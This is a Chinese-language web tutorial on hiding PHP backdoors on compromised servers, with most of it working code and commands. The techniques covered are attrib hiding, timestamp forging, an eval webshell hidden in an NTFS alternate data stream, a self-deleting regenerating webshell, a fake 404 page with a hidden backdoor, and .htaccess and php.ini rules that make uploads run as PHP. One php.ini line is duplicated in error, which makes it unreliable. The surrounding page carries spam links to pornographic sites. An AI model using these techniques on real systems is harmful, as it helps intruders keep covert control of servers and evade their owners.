激情久久久_欧美视频区_成人av免费_不卡视频一二三区_欧美精品在欧美一区二区少妇_欧美一区二区三区的

服務器之家:專注于服務器技術及軟件下載分享
分類導航

PHP教程|ASP.NET教程|Java教程|ASP教程|編程技術|正則表達式|C/C++|IOS|C#|Swift|Android|VB|R語言|JavaScript|易語言|vb.net|

服務器之家 - 編程語言 - PHP教程 - PHP后門隱藏的一些技巧總結

PHP后門隱藏的一些技巧總結

2021-10-28 15:11Bypass PHP教程

這篇文章主要介紹了關于PHP后門隱藏的一些技巧,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧

前言

如果想讓自己的Webshell留的更久一些,除了Webshell要免殺,還需要注意一些隱藏技巧,比如隱藏文件,修改時間屬性,隱藏文件內容等。

1、隱藏文件

使用Attrib +s +a +h +r命令就是把原本的文件夾增加了系統文件屬性、存檔文件屬性、只讀文件屬性和隱藏文件屬性。

?
1
attrib +s +a +h +r shell.php //隱藏shell.php文件

2、修改文件時間屬性

當你試圖在一堆文件中隱藏自己新創建的文件,那么,除了創建一個迷惑性的文件名,還需要修改文件的修改日期。

?
1
2
3
4
5
6
//修改時間修改
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
//訪問時間修改
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
//創建時間修改
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"

使用命令獲取文件屬性

?
1
Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force

修改某個文件夾下所有文件的創建和修改時間

?
1
powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"

3、利用ADS隱藏文件內容

在服務器上echo一個數據流文件進去,比如index.php是網頁正常文件,我們可以這樣子搞:

?
1
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg

這樣子就生成了一個不可見的shell hidden.jpg,常規的文件管理器、type命令,dir命令、del命令發現都找不出那個hidden.jpg的。

利用include函數,將index.php:hidden.jpg進行hex編碼,把這個ADS文件include進去,這樣子就可以正常解析我們的一句話了。

?
1
<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>

4、不死馬

不死馬會刪除自身,以進程的形式循環創建隱蔽的后門。

?
1
2
3
4
5
6
7
8
9
10
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__); //刪除自身
while(1)
{
 file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); //創建shell.php,這里最好用免殺的一句話
 sleep(10); //間隔時間
}
?>

處理方式最簡單有效的辦法,就是重啟服務就可以刪除webshell文件。

5、中間件后門

將編譯好的so文件復制到modules文件夾,啟動后門模塊,重啟Apache。當發送特定參數的字符串過去時,即可觸發后門。

github項目地址:

https://github.com/VladRico/apache2_BackdoorMod

6、利用404頁面隱藏后門

404頁面主要用來提升用戶體驗,可用來隱藏后門文件。

?
1
2
3
4
5
6
7
8
9
10
11
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>

7、利用 .htaccess 文件構成PHP后門

一般.htaccess可以用來留后門和針對黑名單繞過,在上傳目錄創建.htaccess 文件寫入,無需重啟即可生效,上傳png文件解析。

?
1
AddType application/x-httpd-php .png

另外,在.htaccess 加入php解析規則,把文件名包含1的解析成php,上傳1.txt即可解析。

?
1
2
3
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>

8、利用 php.ini 隱藏后門文件

php.ini 中可以指定在主文件執行前后自動解析的文件名稱,常用于頁面公共頭部和尾部,也可以用來隱藏php后門。

;在PHP文檔之前自動添加文件。
auto_prepend_file = "c:\tmp.txt"
;在PHP文檔之后自動添加文件。
auto_prepend_file = "c:\tmp.txt"

需重啟服務生效,訪問任意一個php文件即可獲取webshell。

總結

到此這篇關于PHP后門隱藏的一些技巧的文章就介紹到這了,更多相關PHP后門隱藏技巧內容請搜索服務器之家以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持服務器之家!

原文鏈接:https://mp.weixin.qq.com/s?__biz=MzA3NzE2MjgwMg==&mid=2448906266&idx=1&sn=f9bf831185248cb9d6297b91cfa73ea8

延伸 · 閱讀

精彩推薦
主站蜘蛛池模板: 少妇一级淫片高潮流水电影 | wwwxxx国产 | 国产精品一区视频 | 最新中文字幕日本 | 黄色大片免费网站 | 性色av一区二区三区在线播放亚… | 成人在线观看免费 | www亚洲免费| 国产美女白浆 | 懂色av懂色aⅴ精彩av | 欧美一级黄色片免费观看 | 日韩视频在线观看免费视频 | 国产精品成人一区二区三区电影毛片 | 国产亚洲高清在线精品不卡 | 毛片免费看的 | 91高清免费在线观看 | 亚洲欧美日韩免费 | 在线成人免费视频 | 福利四区 | 精品无码久久久久久国产 | 精品久久久久久久久久久久久久 | 久久蜜桃香蕉精品一区二区三区 | 国产免费美女 | 欧美a级在线免费观看 | 国产精品视频一区二区三区四区国 | 高清中文字幕在线 | 中文字幕在线不卡视频 | 亚洲精品一二三区 | 色播视频网站 | 日韩视频―中文字幕 | 草莓福利视频在线观看 | 中文字幕亚洲情99在线 | 49vv看片免费| 黄色特级一级片 | vidz 98hd | 黄色大片大毛片 | 一区二区三区四区高清视频 | 国产亚洲精品久久久久婷婷瑜伽 | 日本成人高清视频 | 秋霞a级毛片在线看 | 日日爱影院 |